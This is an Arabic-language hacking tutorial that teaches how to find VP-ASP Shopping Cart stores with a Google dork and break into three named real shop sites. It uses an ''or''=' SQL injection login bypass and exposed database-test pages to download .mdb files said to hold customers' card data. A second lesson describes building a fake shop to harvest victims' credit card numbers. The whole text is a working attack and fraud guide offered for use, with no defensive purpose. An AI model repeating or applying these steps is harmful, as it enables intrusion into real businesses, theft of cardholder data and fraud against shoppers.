اول شئ روح لمواقع البحث
www.google.com
www.yahoo.com
------------------------------------------
ابحث عن هذه الكلمه الاتيه
inurl:shopadmin.asp
بعد ظهور المواقع الشوبينج
هنجرب 3 ثغرات واكيد كل المواقع من نوع VP-ASP Shopping Cart يمكن اختراقها او تحميل قواعد البيانات
اللي عليه الفيزا
-------------------------------------------
الثغره الاول
عن طريق كتابه في الاسم و باسورد الادمن
'or''='
الثغراه الثانيه هي في ملف
shopdbtest.asp
---------------------------
الثغره الثالثه
diag_dbtest.asp
-----------------------------------------
بدايه الدرس : هنطبق علي 3 مواقع شوبينج تم اختيرهم من طريق البحث السابقه
http://www.dieugenio.com/consignment/shopadmin.asp
http://www.erboristerialaurora.com/shopadmin.asp
http://fiberopticstuff.com/shopadmin.asp
----------------------------------------------------------------
اول شئ هجرب علي الموقع الثغره الاول
'or''='
http://www.dieugenio.com/consignment/shopadmin.asp
وهي ثغره في نظام 4 VP-ASP Shopping Cart
--------------------------------------------------------------
استخدام الثغره الثانيه
shopdbtest.asp
علي الموقع الاتي
http://www.erboristerialaurora.com/shopadmin.asp
بعد رفض الدخول بالثغره الاول
يظهر ليك الصفح دي
امسح كلمة shopadmin.asp وكتب بدلها shopdbtest.asp
هذه مثل
http://www.erboristerialaurora.com/shopadmin.asp
http://www.erboristerialaurora.com/shopdbtest.asp
الان هنشل كلمه shopdbtest.asp ونضع هنوان قاعد البيانات shopping.mdb
مثل
http://www.erboristerialaurora.com/shopdbtest.asp
http://www.erboristerialaurora.com/shopping.mdb
لان مبروك عليك تحميل قاعده بيانات الان
----------------------------------------------------
شرح الثغره الثالثه
http://fiberopticstuff.com/shopadmin.asp
بعد تجريب الثغره الاول و الثانيه هيتم رف الدخول شئ بعمل
يم مسح كلمه shopadmin.asp ونضع مكنها diag_dbtest.asp
http://fiberopticstuff.com/shopadmin.asp
http://fiberopticstuff.com/diag_dbtest.asp
لان هيظهر هذه الصفحه
بعد معرفت عنوان قاعد البيانات هنغير العنوان الي القاعده
هيتم مسح كلمه diag_dbtest.asp ونضع عنوان القاعده
http://fiberopticstuff.com/diag_dbtest.asp
http://fiberopticstuff.com/shopping500.mdb
مبروك علي تحميل القاعده
الدرس الثاني
كيف كشف ثغره المواقع الشوبينج بنفسك
واستخدام موقع شخصي لخداع الضحايه وجلب الفيزات
VP-ASP Shopping Cart
الان اذهب الي الموقع الرسمي
http://www.vpasp.com
وحمل نسخه برنامج VP-ASP Shopping Cart المجاني
بعد التحميل فك ضغط البرنامج ودخل عليه
الان دور علي اي ملف به كلمه test
بعد البحث في الصاده برنامج الشوبينج 5 تم وجود ملف
طيب الان بعد تحميل البرنامج متسحش البرنامج ولكن استفيد منه عن طريق رفع البرنامج الي موقع يدعم asp
واعمله لبيع الافلام و الاغاني ولم تخترق واحد افتح الموقع اكتير من مره علي شان يشترك وانت تاخود الفيزا
شرح كيف تنزيل صادرت الشوبينج علي الموقع
اشترك في موقع هذه
http://europe.*********matrixhosting.net/
هذه هو اقوي موقع استضافه لل asp
شرح عمل ملف Shop$config.asp
لان ادخل علي هذه الملف عن طرق برنامج Notepad
الان ارفع الملف الي الموقع بياعك وكتب كلمه
install.asp
اتبع التعليمات وهيكون عندك موقع وهمي لسرقه الفيزا
